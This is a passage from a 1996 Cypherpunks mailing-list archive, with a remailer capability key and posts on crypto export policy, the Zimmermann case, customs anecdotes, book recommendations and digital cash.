shinobi  remailer@shinobi.alias.net         _____.-    25:51:28  85.47%
wmono    wmono@valhalla.phoenix.net           *   -     1:02:01  70.76%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sun, 14 Jan 96 23:07:42 PST
To: Jonathan Zamick <JonathanZ@consensus.com>
Subject: Re: COMMUNITY CONNEXION REFUSES TO CENSOR INTERNET SERVICES
In-Reply-To: <v02120d01ad1f4b3400c7@[157.22.240.13]>
Message-ID: <Pine.BSD.3.91.960115061944.27043A-100000@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 14 Jan 1996, Jonathan Zamick wrote:

> 
> Ok, I know better than to get into:
> a) Totally off topic discussions on lists
>
	absolutely, I should have restrained my comment to sameer to:
    "thank you for standing up for all our rights."

> and even worse
> b) Political, off topic discussions.
>
	political --yes, unfortunately.  Off topic --well it is our 
    liberties and our freedoms --and after CI$ using the German prosecuter
    as an excuse to preempt Exon... 

	Yes, I agree, let's muff it; I did not completely or correctly
    express myself. I advocate the total conservative-libertarian belief
    in the absoluteness of the first amendment. 

	Unfortunately, it is seems to be necessary to place a limit as to
    what constitutes constitution freedoms v. the public good.  However, I
    abhor an ever expanding bureaucracy which can only degenerate into an
    ever more powerful thought police. 

	This is the same concept we, as cryptologists, dedicated to
    freedom of expression, privacy, and a means to avoid the fear of
    government intervention, are willing to confront that very authority. 

 
> However, I really do feel its my obligation to offer a counterpoint to
> Attila here. (Not a sanction of his own discussion, but a little debate.)
> I do this because I had a long talk with someone who liked to use weighted
> terms to speak against jews and jewish organizations, and am still a wee
> bit sensitive.
> 
	no, I agree with your premise. I did not intend to imply the 
    "jews are at fault" or any such hate drivel --only that the SWC was
    out of bounds and succumbing to the call for restrictions of the
    rights they themselves have so long championed. 

	my real objection to the SWC is the expectation of guilt; the 
    sins of the father shall be visited upon the sons and their sons, etc.
    you can not live and grow in history. there is _no_ present, only the
    future. and the future is NOW!

> What the SWC asked was idiotic. However, they are in no way guilty of the
> same 'mind-control tactics as the core Nazi party.' 

	we can probably disagree forever --it is a semantical issue.  
    unfortunately, both were built on general fear and hysteria.  However,
    it is essential to fully understand the SWC has NEVER advocated any 
    "final solution" or any other such rot against humanity.

> 
> The reason I'm so sensitive about these things is that the person I had a
> debate with over this area before could see nothing done by Jews in a positive
> light. 
>
	well, I guess the person you were confronting was insecure with
    himself and perhaps even envious of the enormous contributions the
    Jews have been in the advancement of knowledge over history --the
    musicians, writers, statesmen, and so on. 

	I take issue with their general politics, more so because it 
    breeds a backlash which endangers all of us --including them, but that
    is not an issue to cast a negative pall. 

	without trying to start another political war between the
    anarcho-libertarians, progressive libertarians, Jeffersonian
    democrats, Hamiliton-Madison-Jay Federalists, centrists, republicans,
    conservative democrats, liberal democrats, socialists, and marxists
    (did I miss too many shades other than the oligarchists, plutocrats, 
    feudal, and totalitarian states), let's all take a little natural 
    Melotrin <sp? --never tried it myself> and head for pleasant dreams!

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bruceab@teleport.com (Bruce Baugh)
Date: Sun, 14 Jan 96 23:40:47 PST
To: alano@teleport.com.cypherpunks@toad.com
Subject: (fwd) Usenet, No Exit: A Theological Parable
Message-ID: <199601150740.XAA29690@desiree.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Path: nntp.teleport.com!psgrain!newsfeed.internetmci.com!in1.uu.net!CS.Arizona.EDU!news.Arizona.EDU!packrat.aml.arizona.edu!dsew
From: dsew@packrat.aml.arizona.edu (David Sewell)
Newsgroups: news.admin.net-abuse.misc,alt.culture.usenet,alt.usenet.kooks
Subject: Usenet, No Exit: A Theological Parable
Date: 15 Jan 1996 05:28:09 GMT
Organization: Department of Geosciences, University of Arizona
Lines: 116
Message-ID: <4dcol9$c4u@news.ccit.arizona.edu>
NNTP-Posting-Host: packrat.aml.arizona.edu
Summary: What if Boursy/Grubor/Slaton/Vulis went to Heaven...
Keywords: satire spam abuse
Xref: nntp.teleport.com news.admin.net-abuse.misc:35135 alt.culture.usenet:22509 alt.usenet.kooks:27121
Status: N

                        USENET, NO EXIT

                     A Theological Parable

Once upon a time, Stephen Boursy, John Grubor, Jeff Slaton, and Dimitri
Vulis were all travelling together on a bus--probably to "visit"
someone, but the story doesn't say.  While rounding a hairpin turn on a
treacherous mountain road, the bus suddenly skidded, broke through the
guardrail, and plunged two thousand feet, instantly killing everyone on
board.

Boursy, Grubor, Slaton, and Vulis awoke to find themselves floating on
soft clouds before a massive pearly gate, where an old man with
dazzling white robes and a long fleecy beard greeted them.  "I am St.
Peter," he said.  "Tell me who you are and what you have done with
your lives, to help me decide where you belong."

The four eyed each other nervously.  Finally Jeff Slaton stepped
forward.  "Saint Peter, I have aided millions of computer users by
championing free enterprise and protecting the Internet from the
forces of socialism and hypocritical elitism.  I would be honored
to offer my skills in the service of Heaven!"

Next Boursy gathered courage.  "I have fought evil outlaws who 
pretend to be other people in order to cancel their words!"  Nearly
elbowing him aside in his eagerness came Grubor: "St. Peter, I have
valiantly rid the Internet of pushers of hard drugs, and defended
the God-given American right of free speech!"  Last of all Vulis came
forward and flung out his chest as he said, "Like my mentor and
countryman Solzhenitsyn, I have exposed the wiles of evil stukachi
and the lying forger Pidor Vorobieff!"

St. Peter scratched his head and sighed.  "I'm afraid I'm not very up
to date on computers, but Raphael surfs the Net.  Please wait just
a moment."  Instantly there appeared a heroic archangel in shimmering
armor.  "What IS it, Peter?" he said.  "I *finally* found a moment to
install the ELF binaries on His Linux system..."  St. Peter pointed to
the four new arrivals, and began a whispered conference with the
archangel.  Finally St. Peter turned back to them, and with a wide
smile said, "We have chosen accommodations for you; Raphael will show
you to your quarters!"

Everything faded; and when the four could focus their eyes again, they
were with Raphael in a gleaming white room scented with incense and
adorned with precious gems.  A luxurious feather-bed stood against
each wall, and next to each one a gleaming Pentium computer.  "Here
you are," said Raphael.  "You've all got Windows 95 and Ethernet
connections, plus full access to the Web."

"What about Usenet?" asked Grubor, a mite suspiciously.

Raphael smiled indulgently.  "Would we offer an inferior product here?
We who know the secrets of your hearts have designed for you a news
network fit for eternity.  Ten thousand newsgroups, no article
cancellation, no charters, no FAQs, no vote-takers, no rules.  As
Augustine said, 'Love God, and post what thou wilt.'"

"Do you carry heaven.admin.policy?" asked Boursy.  "Yes, my child."
"Heaven.is and heaven.is.too?" asked Grubor.  "Of course."  "You mean
no cancelbots?" asked Slaton.  "Goodness, no, the idea!"  "Does 
heaven.culture.russian have a moderator?" asked Vulis.  "Who but
you, my dear Doctor?"

"You've all got shell accounts on otherworld.org," Raphael continued.
"Use trn to read news and Pnews to post.  Of course our version of
Pnews doesn't give you that silly scolding about how much money your
post is going to cost the entire Net."

The four rushed to their computers, and for some time nothing could be
heard but the clacking of keys against the faint background of harp
music.  At length all were silent, until Slaton shouted, "Gather
round, and let's see the fun!"  As the others crowded about his
terminal, he typed "trn", and tapped his fingers impatiently until a
prompt appeared:

   ======  4 unread articles in heaven.general -- read now? [+ynq]

"Hmm, that's kind of odd..." Slaton murmured as he hit the + key.
 
    a Sanctified Spam    1  No more A P O L O G I E S, Suu--eeeee!
    b Doctor of Theology 2  Chris Lewis needs an angelic visitor!
      Stephen Boursy        >Make that two angelic visitors!
    d Dr. Dimitri Vulis  1  First List of lying stukachi Seraphim

    (Mail) -- Select threads (date order) -- All [Z>] --

"WHAT??" the four cried, with one voice.  "Where's the rest of the
posts?  Where's everybody else??!!"

Raphael's eyes gleamed.  "Who said anything about anyone else?"

For the first time ever, Boursy had a clue.  "Where... just where 
ARE we, anyway?"

Raphael quickly strode to the door and turned as he passed through.
"You know what Sartre said.  L'Usenet, c'est les autres!  Enjoy
eternity!" And with that the door shut and the lock clicked with
an authoritative "sneck!".

And as the four rushed wild-eyed to their terminals to compose 
furious denunciations, eight eyes processed in horror the message
that appeared there:

      Broadcast Message from root@otherworld
             (/dev/tty1) at 00:00 ...
      
      System going down in 2 minutes, back up in a few aeons
      --Chris Lewis, SysAdm

                         *** ***
                         THE END

-- 
David Sewell  *  dsew@packrat.aml.arizona.edu  | "Seekers for gold dig much
Dep't of Geosciences, Univ. of Arizona         | earth, and find little gold."
 WWW: http://packrat.aml.arizona.edu/~dsew/    |           --Heraclitus


bruceab@teleport.com - <*> - http://www.teleport.com/~bruceab/index.html
List Manager, Christlib, where Christian & libertarian concerns hang out
Science fiction readers: Preview S.M. Stirling's DRAKON and WORD OF NIGHT
(the new Marid Audran novel by George Alec Effin ger) at my home page.
New PGP key on Web key servers; old keys are toast.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SINCLAIR  DOUGLAS N <sinclai@ecf.toronto.edu>
Date: Mon, 15 Jan 96 05:04:21 PST
To: jimbell@pacifier.com (jim bell)
Subject: Re: Respect for privacy != Re: exposure=deterence?
In-Reply-To: <m0tbe6z-00091JC@pacifier.com>
Message-ID: <96Jan15.080404edt.1578@cannon.ecf.toronto.edu>
MIME-Version: 1.0
Content-Type: text/plain


> What _I_ meant was that government employees deserve NO privacy, if for no 
> other reason than that they've accepted tax dollars stolen from taxpayers.

I am a Canadian student, so my education is largely funded by the state
using stolen money.  Do I deserve privacy?  Do people receiving welfare
deserve privacy?

~ Let him who is without sin cast the first stone ~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Mon, 15 Jan 96 05:11:28 PST
To: cypherpunks@toad.com
Subject: New Puzzle Palace? Re: CAQ - Secret ...
In-Reply-To: <Pine.BSD.3.91.960114191757.28537A-100000@ahcbsd1.ovnet.com>
Message-ID: <Pine.3.89.9601150740.A42507-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 14 Jan 1996, James M. Cobb wrote:

>           James Bamford 
>           The Puzzle Palace (with a new Afterword) 
>           Penguin Books 
>           1983 

Schneier's new bibliography mentions a second edition of the book published
in 1995. Is this really a substantively new edition with more material or is
it just being repackaged with a new Afterword? I'm just wondering whether 
it is worth buying to someone who has the original.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Shantz" <bshantz@nwlink.com>
Date: Mon, 15 Jan 96 08:32:04 PST
To: attila <attila@primenet.com>
Subject: Re: Phil Z getting through customs
Message-ID: <199601151632.IAA21061@montana.nwlink.com>
MIME-Version: 1.0
Content-Type: text/plain


 attila <attila@primenet.com> wrote:
>     answer the questions truthfully and they can not detain you???

Not true, I've been detained by Canadian customs for doing just that.
Everything went reasonably smoothly thanks to the customs officials 
lack of knowledge of NAFTA.  However, one of my travelling partners 
had trouble with customs due to ...hmmm... their lack of knowledge of 
NAFTA.

> 	Rule 1:	 smile regardless of the adversity

That's a good rule for things other than customs dealings.

> 	Rule 2:	 other than the three questions on the form, say nothing

I was asked if I had any eggs.  I still don't know why.

> 	Rule 3:  never use LA or Dulles -pick an airport with humans.

Never use the airport in Ottawa, Ontario from out of the country.  
Fly to Detroit and get on  a bus.  Drive across the border to Windsor, Ont. 
 Then, you can fly to Ottawa and not deal with customs at the airport.

Later,

Brad

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sten Drescher <stend@grendel.texas.net>
Date: Mon, 15 Jan 96 06:48:13 PST
To: cypherpunks@toad.com
Subject: Re: Zimmermann case is dropped.
In-Reply-To: <199601150642.WAA16157@ix13.ix.netcom.com>
Message-ID: <55g2dhy0o9.fsf@galil.austnsc.tandem.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> said:

BS> At 11:22 AM 1/12/96 -0600, Alex Strasheim <cp@proust.suba.com>
BS> wrote:
>> We need a large sponser who is willing to run a more ambitious crypto
>> archive.  If an institution like MIT hosted a more generalized site
>> where people could distribute code, it would go a long way towards
>> thawing out the chill the government's managed to create by harassing
>> PRZ.

BS> Oxford University, University of Milan, and Finnish University
BS> Network not big enough for you?

	No, they are in the wrong countries for the desired purpose,
which is to challenge ITAR.

-- 
#include <disclaimer.h>				/* Sten Drescher */
1973 Steelers    About Three Bricks Shy of a Load    1994 Steelers
1974 Steelers         And the Load Filled Up         1995 Steelers?
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
Unsolicited email advertisements will be proofread for a US$100 fee.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Mon, 15 Jan 96 09:31:53 PST
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: (none) [httpd finding your identity]
In-Reply-To: <30F9FEF0.6EAA@netscape.com>
Message-ID: <199601151725.JAA16853@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>   I think that there are several.  The one at CMU can be reached
> at http://anonymizer.cs.cmu.edu:8080/open.html.  I thought that
> Sameer had one at c2.org, but a quick look at his web site didn't
> turn up anything.

	c2.org will be hosting the anonymizer shortly. We can't
exactly run it off of our T1 though, so we have to wait a little while
until we get T3 access.

-- 
Sameer Parekh					Voice:   510-601-9777x3
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdavidm@iconz.co.nz (David Murray)
Date: Mon, 15 Jan 96 10:04:35 PST
To: cypherpunks@toad.com
Subject: Australian GAK?
Message-ID: <pnr026584719x@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've just seen a note to the effect that the (Australian) Senate Economics
References Committee has recommended, in their recently tabled report
quaintly entitled _Connecting You Now...Telecommunications to the Year
2000_ the establishment of a third party body for the management of public
key authentication.

The Committee has also recommended the establishment of a national
authentication system to be recognised internationally with credibility with
the legal system - True Names, most probably.

Any c'punks closer to Canberra with the real goods?

Dm

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMPl3Vllo3j8JHzalAQEANgQAqXmbEi26osro0800FHzuDE999Kzfialr
zRm4goMk04ZMI1+ciEsmvxZg7zbH3wppCTctPWmnl+Nv0Hrg32/eub3VJMRgeSCT
+5pKUovyH7iPhxNxaC9rWSQ5trnndeJwx9FcfHuhOKUVYpMetFdrTWSaAw+GXeA7
3Sabvrab0lk=
=ZOOl
-----END PGP SIGNATURE-----

[Palmtop News Reader - Version 1.0]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 15 Jan 96 09:33:18 PST
To: cypherpunks@toad.com
Subject: Re: New Puzzle Palace? Re: CAQ - Secret ...
Message-ID: <ad1fd03c000210044092@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:08 PM 1/15/96, s1018954@aix2.uottawa.ca wrote:
>On Sun, 14 Jan 1996, James M. Cobb wrote:
>
>>           James Bamford
>>           The Puzzle Palace (with a new Afterword)
>>           Penguin Books
>>           1983
>
>Schneier's new bibliography mentions a second edition of the book published
>in 1995. Is this really a substantively new edition with more material or is
>it just being repackaged with a new Afterword? I'm just wondering whether
>it is worth buying to someone who has the original.

The new edition is supposed to be a substantial rewrite, updating the book
to include a lot of the recent stuff on the NSA. Don't quote me, but I
think Bamford has a co-author, though I've forgotten who it is.

I paid the princely sum of $16.95 in 1982--expensive for a book back
then--for "The Puzzle Palace," and read it cover-to-cover (well, I guess I
skimmed the footnotes). Even before I got into crypto in a big way, I knew
this stuff was important to me.

I certainly plan to buy the Second Edition.

--Tim May




We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 15 Jan 96 09:39:06 PST
To: cypherpunks@toad.com
Subject: Eggs at Customs
Message-ID: <ad1fd1910102100490ad@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:32 AM 1/15/96, Brad Shantz wrote:
>
>I was asked if I had any eggs.  I still don't know why.
>

Meaning you weren't cleared for expedited handling. My CIA and NSA friends
had alerted me to this question and given me the special answer:

Me: "Yes, I have green eggs, and ham, too. The eggs in Paris are especially
fresh this time of year."

This got me waved through.

--Tim May


We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Corey Bridges <corey@netscape.com>
Date: Mon, 15 Jan 96 11:07:00 PST
To: cypherpunks@toad.com
Subject: Commerce Dept Recommends Strong Crypto Export
Message-ID: <199601151906.LAA19362@urchin.netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Well. Now that the government itself is taking up the charge, I'm sure we
can expect a speedy resolution. 

Yeah, right.


             ***

 Scrambled software gets an OK
 
 -- Exports: Foreign encoding unfair to U.S. firms, Commerce Department
 says.
 
 Bloomberg Business News
 
 WASHINGTON -- The Commerce Department will recommend easing export
 controls on encryption software after a study by the department and
 the National Security Agency found the restrictions are hurting U.S.
 firms, Commerce Secretary Ron Brown said.
 
 Such a move may pit Brown's department against U.S. defense and spy
 agencies, however, setting the stage for a White House battle over one
 of the last computer technologies still covered by export controls.
 
 ``I'm interested in promoting American exports,'' Brown said.
 
 ``If your foreign competitors are exporting products with encryption
 capability and you are not, that puts you at a tremendous competitive
 disadvantage,'' he said.
 
 Encryption software turns information, such as files and credit card
 numbers, into indecipherable material that can be sent across networks
 without fear of tampering to the recipient, who can then unscramble
 it. Under current U.S. law, encryption technology that exceeds certain
 technical thresholds is considered a ``munition.'' Those who would
 export such technology need explicit permission from the government.
 
 The United States justifies the export restrictions by saying
 law-enforcement agencies would be hamstrung in their efforts to stop
 terrorists, spies and criminals without them.
 
 The computer industry counters that encryption software is available
 from other countries, and the restrictions simply rob U.S. companies
 of business.
 
 The Computer Systems Policy Project, a joint effort of 13 top
 technology companies released its own study showing that U.S.
 companies will lose as much as 30 percent of the $200 billion in U.S.
 computer system sales expected in 2000 because of federal laws
 limiting exports of encryption products.
 
 Brown said his department will prepare recommendations for easing
 those controls that should be forwarded to the president ``within a
 few months.''
 
 It's unclear if the NSA endorsed the Commerce Department's conclusions
 in the report it jointly prepared. Representatives of the NSA were
 unavailable for comment.
 
 Brown's assertion comes a day after federal prosecutors dropped a
 three-year investigation of Boulder, Colo., software designer Philip
 Zimmermann, whose encryption program called Pretty Good Privacy was
 posted on the Internet, the worldwide computer network.
 
 Published 1/13/96 in the San Jose Mercury News. Reprinted digitally here
 without permission, and probably illegally.

Corey Bridges
Security Documentation
Netscape Communications Corporation
home.netscape.com/people/corey
415-528-2978





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Corcoran <tjic@OpenMarket.com>
Date: Mon, 15 Jan 96 08:09:37 PST
To: cypherpunks@toad.com
Subject: c'punks at RSA conference
Message-ID: <199601151609.LAA03884@cranmore.openmarket.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Message-Signature-Date: Mon Jan 15 11:09:09 1996

Sorry if I've missed any previous posts on this topic, but...

are any subscribers to this list going to be at the RSA conference
this week?

If so, anyone interested in doing a PGP key-signing?

Please reply via email; I'm certain to read it before travelling.

- -- 
TJIC (Travis J.I. Corcoran)  http://www.openmarket.com/personal/tjic/index.html

                             Member EFF, GOAL, NRA.
                 opinions (TJIC) != opinions (employer (TJIC))
         "Buy a rifle, encrypt your data, and wait for the Revolution!"
	 PGP encrypted mail preferred.   Ask me about mail-secure.el for emacs.



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed by mail-secure.el 1.006 using mailcrypt
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

iQCVAwUBMPp8KIJYfGX+MQb5AQExzQP/dVyyr9uQcMCd7UlFMD4+TVDaFBlRM7wL
MrpDarq9QlZ8vYZd0ECjC8MyxUE5Kl95yVYl1BySRPohwD6wUFFn6loemDSDdF6c
gS6ku68I2+kZukHSY8MI45V5zqJ9dNWGTAgRH5eAlekRkWujUsZGwOtpW9mKCTUd
RIRPyNs/9tE=
=5+i5
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 15 Jan 96 11:18:32 PST
To: Brad Shantz <bshantz@nwlink.com>
Subject: Re: Phil Z getting through customs
In-Reply-To: <199601151632.IAA21061@montana.nwlink.com>
Message-ID: <Pine.SOL.3.91.960115110146.23947A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Jan 1996, Brad Shantz wrote:
> 
> I was asked if I had any eggs.  I still don't know why.

bad answer: No, I'm post-menopausal.

Most countries strictly regulate the import of any kinds of produce. This
is to try and prevent the introduction of new pests and diseases; the
controls are even stricter for livestock, especially in the UK (which
would like to remain rabies free). 

When I was a student and had long hair, I used to always get questioned
when going throught customs. After graduating, and having normal length
hair, I had a lot less trouble. Long serving customs officers develop
models of characteristics that in the past have been indicative of
smuggling or wrong doing. Given that most points of entry are
under-staffed, there's not much else they can do.

The strictest customs I've been through is at Lod (Tel Aviv); there the 
assumption is that everybody is going to try and bring in at least 
some sort of radio/fax machine to avoid the high taxes, so they check all 
baggage. They do have the best security team in general though, so it 
balances out.

Simon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Mon, 15 Jan 96 12:04:49 PST
To: cypherpunks@toad.com
Subject: They Thought They Were Free
Message-ID: <199601152004.MAA04313@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


As long as we're on the subject of recommending books ...
a great one is Milton Mayer's "They Thought They Were Free", 
interviews with ten Germans post-war.     The title pretty
much sums it up.   Mayer was an excellent writer and journalist.
The book is hard to find.   

title: "they thought they were free: the germans, 1933-45"
author:  milton mayer
University of Chicago Press, 1955
ISBN 0-226-51190-1 (cloth)
ISBN 0-226-51192-8 (paper) 
Library of Congress Catalog Card Number 55-5137

One quote at the beginning of the book: 

  The Pharisee stood and prayed thus with himself
     "God, I thank Thee, that I am not as other men are." 

Here's hoping cypherpunks don't start echoing that sentiment ...

Marianne






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 15 Jan 96 11:09:22 PST
To: grimm@MIT.EDU
Subject: New Puzzle Palace?
Message-ID: <ad1fe6fe020210049989@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:40 PM 1/15/96, grimm@MIT.EDU wrote:
>Schneier has done a major rewrite, or at least included *lots* of new
>info.  I haven't gotten a copy yet, but I saw one, and it was twice as
>thick as the first version.

Are you talking about "The Puzzle Palace," or about "Applied Cryptography"?

I thought the thread was about "The Puzzle Palace." It's certainly possible
that Bruce Schneier has contributed to a second edition, beyond the
Foreward or whatever it is, but your comments fit with "Applied
Cryptography" closely, too.

Have you seen a copy of "The Puzzle Palace," 2nd Ed.?


--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: grimm@MIT.EDU
Date: Mon, 15 Jan 96 09:36:41 PST
To: rfb@lehman.com
Subject: Re: Bignum support added to XLISP 2.1h
In-Reply-To: <9601150438.AA22146@cfdevx1.lehman.com>
Message-ID: <9601151736.AA00893@w20-575-119.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Also in the area of "bignum support", I have developed a C++ class for
large integers.  I haven't made in solid speed measurements yet, but
it seems to be relatively fast.  (More precisely, I was able to
compute large Fibonacci numbers much faster than in scheme running
under emacs.  I don't claim this to be thorough measurement in any
way!)  If anyone is interested, send me email.

-James



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: grimm@MIT.EDU
Date: Mon, 15 Jan 96 09:44:44 PST
To: jcobb@ahcbsd1.ovnet.com
Subject: Re: DEC's MICROCASH
In-Reply-To: <Pine.BSD.3.91.960114201707.28537C-100000@ahcbsd1.ovnet.com>
Message-ID: <9601151744.AA00904@w20-575-119.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain



My question becomes, "Is it harder to crack one encrypted transaction
for $10,000, or 100,000 plaintext transactions for the same amount?"

Answer:  Don't know.  That's why I am posting this message.


-James




   Date: Sun, 14 Jan 1996 20:19:24 -0500 (EST)
   From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
   Mime-Version: 1.0
   Content-Type: TEXT/PLAIN; charset=US-ASCII
   Sender: owner-cypherpunks@toad.com
   Precedence: bulk



     Friend, 


     01 14 96 Edupage includes: 

     MICROCASH

     Digital Equipment filed a patent last August for a payment 
     system called Millicent, which enables Web-site operators 
     to charge as little as a tenth of a cent for each customer 
     "hit." 

     The system relies on middle-men --credit card companies or 
     digital banks -- to handle the transactions, but its novelty 
     lies in its cost-effective design geared toward tracking 
     minuscule amounts of cash.  To keep disk storage at a minimum, 
     security measures providing privacy and a trail of signed re- 
     ceipts are not included in the system, but proponents point out 
     that would-be cyberthieves would have to crack a lot of trans- 
     actions -- 10,000 at 0.1 cent each -- to make just $10.  "There 
     are easier ways to make 10 bucks," says Millicent's inventor. 

     (Business Week 15 Jan 96 p90) 


     Cordially, 

     Jim 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 15 Jan 96 12:13:49 PST
To: cypherpunks@toad.com
Subject: Crypto anarchist getting through customs
Message-ID: <ad1ff257040210044402@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:21 PM 1/15/96, Simon Spero wrote:

>When I was a student and had long hair, I used to always get questioned
>when going throught customs. After graduating, and having normal length
>hair, I had a lot less trouble. Long serving customs officers develop
>models of characteristics that in the past have been indicative of
>smuggling or wrong doing. Given that most points of entry are
>under-staffed, there's not much else they can do.

I was returning from France and Monte Carlo, where I'd given a talk about
crypto anarchy, through U.S. Customs at San Francisco. Having just heard of
Matt Blaze's experiences, I figured I'd be truthful and see what happened.

(I can't recall the exact words, naturally, so this is just a rough
version. Things were uncrowded at the Customs gate, and I was the only one
in his line, in case it matters.)

Young Customs Officer (YCO): "Where are you coming from?"

Me: "Monte Carlo. And France."

YCO: "Business or pleasure?"

Me: "Business."

YCO: "What was the business?"

Me: "I met with cryptographers and bankers to discuss cryptography and
political implications."

YCO: " 'Cryptography'? "  (A look of no comprehension.)

Me: "Yes, cryptography. You know, secret codes, ciphers, stuff like that."

YCO: "Were there any foreigners present?"

Me: "Yes, it was in Monte Carlo. There were some Russians there, and lots
of others."

YCO: [brief pause] "Did you bring anything back with you?"

Me: "No."

YCO: [waved me through]


In my carry-on luggage I had half a dozen magneto-optical disks, carring
about a gigabyte of stuff. (As props to use during my talk on the
France/Monte Carlo side, ironically, to show that borders are fully
transparent.)

By the way, there were no outgoing checks [unlike Matt, I didn't seek out
permission to export anything], of course, and no checks at my entry point
at De Gaulle Airport in Paris. [Though there were lots of cops with machine
guns, and lots of dire warnings that bags left unattended might be
destroyed, a precaution against bombs.] No checks into Monte Carlo, of
